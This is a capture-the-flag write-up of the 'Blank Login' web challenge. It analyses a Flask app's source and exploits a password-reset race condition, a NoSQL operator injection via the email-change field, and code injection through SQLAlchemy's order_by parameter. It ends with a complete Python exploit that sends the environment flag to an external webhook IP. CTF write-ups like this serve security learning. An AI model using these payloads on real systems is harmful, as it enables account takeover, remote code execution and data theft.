WWFctf2025 | Blank Login - ByteTheCookies

Introduction#

This is the third web application I’ve exploited. It’s a very cool challenge, not too complex, and very fun. There’s a not-very-easy race condition to spot. In fact, I think that’s the most difficult part. So, let’s start.

We have a small Flask application with about 200 lines of code, so it’s not too bad. The first page is a login page without a register page.

The first thing to do is read the code.

Source#

We can start with the set up of the flask application

1
# Flask setup - session store
2
app = Flask(__name__)
3
app.secret_key = bcrypt.hashpw(secrets.token_urlsafe(24).encode(), bcrypt.gensalt()).hex()
4
app.config['SESSION_TYPE'] = 'filesystem'
5
Session(app)
6

7
# MongoDB setup - users
8
mongo_client = MongoClient("mongodb://mongo:27017/")
9
mongo_db = mongo_client["flaskdb"]
10
mongo_users = mongo_db["users"]
11
mongo_users.delete_many({})
12
admin_user = {
13
    "username": "admin",
14
    "password": bcrypt.hashpw(secrets.token_urlsafe(24).encode(), bcrypt.gensalt()).hex(),
15
    "email": "[email protected]"
16
}
17
regular_user = {
18
    "username": "user",
19
    "password": bcrypt.hashpw(secrets.token_urlsafe(24).encode(), bcrypt.gensalt()).hex(),
20
    "email": "[email protected]"
21
}
22
mongo_users.insert_many([admin_user, regular_user])
23

24
# SQLite setup - audit trail
25
Base = declarative_base()
26
engine = create_engine("sqlite:///audit_log.db", connect_args={"check_same_thread": False})
27
SessionLocal = sessionmaker(bind=engine)
28

29
class SearchBase(Base):
30
    __tablename__ = "search_base"
31
    id = Column(Integer, primary_key=True)
32

33
class AuditLog(Base):
34
    __tablename__ = "audit_log"
35
    id = Column(Integer, primary_key=True)
36
    parent_id = Column(Integer, ForeignKey("search_base.id"))
37
    username = Column(String)
38
    action = Column(String)
39
    timestamp = Column(Integer)
40

41

42
# Other code....
43

44

45
if __name__ == "__main__":
46

47
    Base.metadata.create_all(bind=engine)
48

49
    # MySQL setup - reset tokens
50
    for _ in range(10):
51
        try:
52
            mysql_conn = mysql.connector.connect(
53
                host="mysql", user="root", password="rootpass", database="flaskdb"
54
            )
55
            if mysql_conn.is_connected():
56
                break
57
        except Error:
58
            time.sleep(3)
59
    if not mysql_conn:
60
        raise Exception("MySQL connection failed.")
61
    # Reset token setup
62
    cursor = mysql_conn.cursor(dictionary=True)
63
    cursor.execute("""
64
        CREATE TABLE IF NOT EXISTS reset_tokens (
65
            id INT AUTO_INCREMENT PRIMARY KEY,
66
            username CHAR(255),
67
            token CHAR(255) DEFAULT ''
68
        ) CHARACTER SET = utf8mb4 COLLATE = utf8mb4_general_ci;
69
    """)
70
    for username in ['user', 'admin']:
71
        cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
72
        cursor.execute("INSERT INTO reset_tokens (username) VALUES (%s)", (username,))
73
        cursor.execute("UPDATE reset_tokens SET token = %s WHERE username = %s", (get_random_token(), username))
74
    mysql_conn.commit()
75
    cursor.close()
76
    mysql_conn.close()
77

78
    app.run(host="0.0.0.0", port=5000, debug=False, threaded=True)

Okay, so analyzing the code, we have:

Two registered a user: user and admin, with passwords that are securely and randomly generated.
We use three databases, each with a specific purpose.
- MySQL: Store the token for password resets.
- Mongo: Store users
- SQLite3: Store the audit logs. This is a bit strange, but okay.

Now, let’s look at some endpoints.

1
# Main login page
2
@app.route("/login", methods=["GET", "POST"])
3
def login():
4
    error = None
5
    if request.method == "POST":
6
        username = request.form.get("username", "").strip()
7
        password = request.form.get("password", "").strip()
8
        if not re.fullmatch(r'^[\w@#$%^&+=!]{1,64}$', password):
9
            error = "Invalid password format."
10
        else:
11
            user = mongo_users.find_one({"username": username, "password": password})
12
            if user:
13
                session["email"] = user["email"]
14
                log_audit_event(username, "login_success")
15
                return redirect("/")
16
            log_audit_event(username, "login_failure")
17
            error = "Invalid credentials."
18
    return render_template("login.html", error=error)
19

20
# Allow users to change their email address
21
@app.route("/", methods=["GET", "POST"])
22
def me():
23
    if "email" not in session:
24
        return redirect("/login")
25
    current_email = session["email"]
26
    message = None
27
    if request.method == "POST":
28
        # Validate email
29
        new_email = request.get_json().get("new_email") if request.is_json else request.form.get("new_email")
30
        if mongo_users.find_one({"email": {"$eq": new_email}}):
31
            message = "That email is already in use."
32
        else:
33
            # Update email address
34
            result = mongo_users.update_one({"email": current_email}, {"$set": {"email": new_email}})
35
            if result.modified_count == 1:
36
                session["email"] = new_email
37
                message = "Email updated successfully"
38
            else:
39
                message = "Failed to update email."
40
    return render_template("me.html", email=session["email"], message=message)
41

42
# Administrators can view the audit logs
43
@app.route("/audit_logs", methods=["GET"])
44
def audit_logs():
45
    if "email" not in session:
46
        return redirect("/login")
47
    user = mongo_users.find_one({"email": session["email"]})
48
    if not user or user.get("username") != "admin":
49
        return "Access denied", 403
50
    order_by = request.args.get("order_by", "timestamp")
51
    if not any(order_by.startswith(col) for col in ['username', 'action', 'timestamp']):
52
        order_by = "timestamp"
53
    SearchBase.logs = relationship("AuditLog", order_by=f'AuditLog.{order_by}')
54
    db = SessionLocal()
55
    bases = db.query(SearchBase).all()
56
    logs = [log for base in bases for log in base.logs]
57
    db.close()
58
    return render_template("audit_logs.html", logs=logs)
59

60
# Users can request a new password
61
@app.route("/reset_request", methods=["GET", "POST"])
62
def reset_request():
63
    message = None
64
    if request.method == "POST":
65
        # Validate username
66
        username = request.form.get("username", "").strip()
67
        if not username:
68
            message = "Username is required."
69
        elif not username.isalnum():
70
            message = "Invalid username"
71
        elif 'admin' in username.lower():
72
            message = "Reset not allowed for admin"
73
        # Get user
74
        elif (user := mongo_users.find_one({"username": username})):
75
            conn = get_db()
76
            cursor = conn.cursor()
77
            try:
78
                # Remove all old entries
79
                cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
80
                conn.commit()
81
                # Create new entry
82
                cursor.execute("INSERT INTO reset_tokens (username) VALUES (%s)", (username,))
83
                conn.commit()
84
                # Set new token
85
                cursor.execute("UPDATE reset_tokens SET token = %s WHERE username = %s", (get_random_token(), username))
86
                conn.commit()
87
                message = "Reset email sent." # Backend job sends the reset email
88
            except:
89
                message = "Unhandled failure."
90
            finally:
91
                cursor.close()
92
        else:
93
            message = "User not found."
94
        return render_template("result.html", message=message)
95
    return render_template("reset_request.html")
96

97
# Users can set a new password with a valid reset token
98
@app.route("/reset", methods=["GET", "POST"])
99
def reset():
100
    message = None
101
    if request.method == "POST":
102
        # Validate password and token
103
        token = request.form.get("token", "")
104
        new_password = request.form.get("new_password", "")
105
        if not re.fullmatch(r'^[\w@#$%^&+=!]{6,64}$', new_password):
106
            message = "Invalid password format."
107
        elif not token or len(token) < 16:
108
            message = "Invalid token format."
109
        else:
110
            # Get user for token
111
            conn = get_db()
112
            cursor = conn.cursor(dictionary=True)
113
            cursor.execute("SELECT * FROM reset_tokens WHERE token = %s", (token,))
114
            row = cursor.fetchone()
115
            cursor.close()
116
            if row:
117
                # Reset user password
118
                username = row["username"].strip()
119
                mongo_users.update_one({"username": username}, {"$set": {"password": new_password}})
120
                cursor = conn.cursor()
121
                cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
122
                conn.commit()
123
                cursor.close()
124
                message = f"Password updated"
125
            else:
126
                message = "Invalid token."
127
        return render_template("result.html", message=message)
128
    return render_template("reset.html")

We have some cool endpoints:

/: Main route a route to change your email address while logged in.
/login: Pretty clear.
/audit_logs: An admin endpoint to view all audit logs.
/reset_request: Reset password request by username.
/reset: Resets the password using the username and token.

I think it’s pretty straightforward, don’t you?

Solution#

The first step is to search for the flag position. In this case, it is in an env variable.

1
  web:
2
    build: .
3
    ports:
4
      - "5000:5000"
5
    depends_on:
6
      - mongo
7
      - mysql
8
    environment:
9
      - FLASK_ENV=production
10
      - FLAG=wwf{not_the_flag}

Okay, so the goal is to get RCE. The first thing to do is to check for SSTI, but that’s not the case here.

Now, the most difficult part is checking all the code. The most suspicious things are:

NoSQL injection in the reset email form.

1
new_email = request.get_json().get("new_email") if request.is_json else request.form.get("new_email")

The line is bad because if we pass the header JSON, it passes all the objects, not just a string.

It’s a sort of code injection in the SQLAlchemy function in the audit logs endpoint.

1
    if not any(order_by.startswith(col) for col in ['username', 'action', 'timestamp']):
2
        order_by = "timestamp"
3
    SearchBase.logs = relationship("AuditLog", order_by=f'AuditLog.{order_by}') # Not very good
4
    db = SessionLocal()
5
    bases = db.query(SearchBase).all()

Okay, nice. We have a code injection. Is that all? No, because to get access to the endpoint, we have to become an admin. We don’t have a login for the user account, so it’s pretty useless.

After much trial and error, I discovered a cool race condition between the /reset_request and /reset endpoints.

1
# Users can request a new password
2
@app.route("/reset_request", methods=["GET", "POST"])
3
def reset_request():
4
    message = None
5
    if request.method == "POST":
6
        # Validate username
7
        username = request.form.get("username", "").strip()
8
        if not username:
9
            message = "Username is required."
10
        elif not username.isalnum():
11
            message = "Invalid username"
12
        elif 'admin' in username.lower():
13
            message = "Reset not allowed for admin"
14
        # Get user
15
        elif (user := mongo_users.find_one({"username": username})):
16
            conn = get_db()
17
            cursor = conn.cursor()
18
            try:
19
                # Remove all old entries
20
                cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
21
                conn.commit()
22
                # Create new entry
23
                cursor.execute("INSERT INTO reset_tokens (username) VALUES (%s)", (username,))
24
                conn.commit()
25
                # Set new token
26
                cursor.execute("UPDATE reset_tokens SET token = %s WHERE username = %s", (get_random_token(), username))
27
                conn.commit()
28
                message = "Reset email sent." # Backend job sends the reset email
29
            except:
30
                message = "Unhandled failure."
31
            finally:
32
                cursor.close()
33
        else:
34
            message = "User not found."
35
        return render_template("result.html", message=message)
36
    return render_template("reset_request.html")

When we make a reset request, the server makes three different commits, one for each query. In this case, it’s very bad because there’s a moment when the token is equal to an empty string. Especially, the database is set to CHARACTER SET = utf8mb4 COLLATE = utf8mb4_general_ci, so spaces are trimmed from the query.

We can basically make a /reset request and, at the same time, make a /reset_request. This allows us to change the password of ONLY the user (because the admin is blocked) and log in.

Okay, but how can we log in as an admin? Easy. Remember the NoSQLi we can use to bypass the admin check in the /audit_logs endpoint with a basic logic injection: { "$gt": ""} (This is a possible payload.) We can inject the payload thanks to the email change.

Now, if we try to make a GET request to /audit_logs, we have access, and we can make the code injections.

1
#!/usr/bin/python3
2
import random
3
import string
4
import threading
5
import urllib.parse
6
import requests
7

8
BASE_URL = "https://{instance_id}.chall.wwctf.com"
9
WEBHOOK_URL = "http://178.63.67.153/eb3102da-b96c-48b5-92c9-d59301574330/"
10

11
s = requests.Session()
12

13

14
payload_spaces = " " * 32
15
token_field   = urllib.parse.quote_plus(payload_spaces)
16
new_pass      = "cookie"
17

18
def spam_reset_request():
19
    while True:
20
        s.post(f"{BASE_URL}/reset_request",
21
                      data={"username": "user"},
22
                      timeout=3)
23

24
def race_reset():
25
    while True:
26
        data = {"token": payload_spaces, "new_password": new_pass}
27
        r = s.post(f"{BASE_URL}/reset", data=data, timeout=3)
28
        if "Password updated" in r.text:
29
            print("[+] Race WON!")
30
            break
31

32
def login():
33
    data = {"username": "user", "password": new_pass}
34
    r = s.post(f"{BASE_URL}/login", data=data)
35
    if "New Email" in r.text:
36
        print("[+] Logged in successfully!")
37
    else:
38
        print("[-] Failed to log in.")
39

40
def update_email():
41
    data = {"new_email":  { "$gt": "" }}
42
    r = s.post(f"{BASE_URL}", json=data)
43
    if "Email updated successfully" in r.text:
44
        print("[+] Email updated successfully!")
45
    else:
46
        print("[-] Failed to update email.")
47

48

49
def audit_logs():
50
    payload = f"(__import__('urllib.request', fromlist=['urlopen']).urlopen('{WEBHOOK_URL}?f='+(__import__('os').getenv('FLAG','NF'))))"
51
    r = s.get(f"{BASE_URL}/audit_logs",params={"order_by": f"timestamp.desc(),{payload}"})
52
    if "Access denied" in r.text:
53
        print("[-] Access denied to audit logs.")
54
    else:
55
        print("[+] Audit logs accessed successfully!")
56
        print(r.text)
57

58
def main():
59
    threading.Thread(target=spam_reset_request, daemon=True).start()
60
    race_reset()
61
    login()
62
    update_email()
63
    audit_logs()
64

65

66

67
if __name__ == "__main__":
68
  main()
69

70

71
# goodluck by @akiidjk

flag: wwf{Ju57_G1v3_mE_S0m3_5p4ce}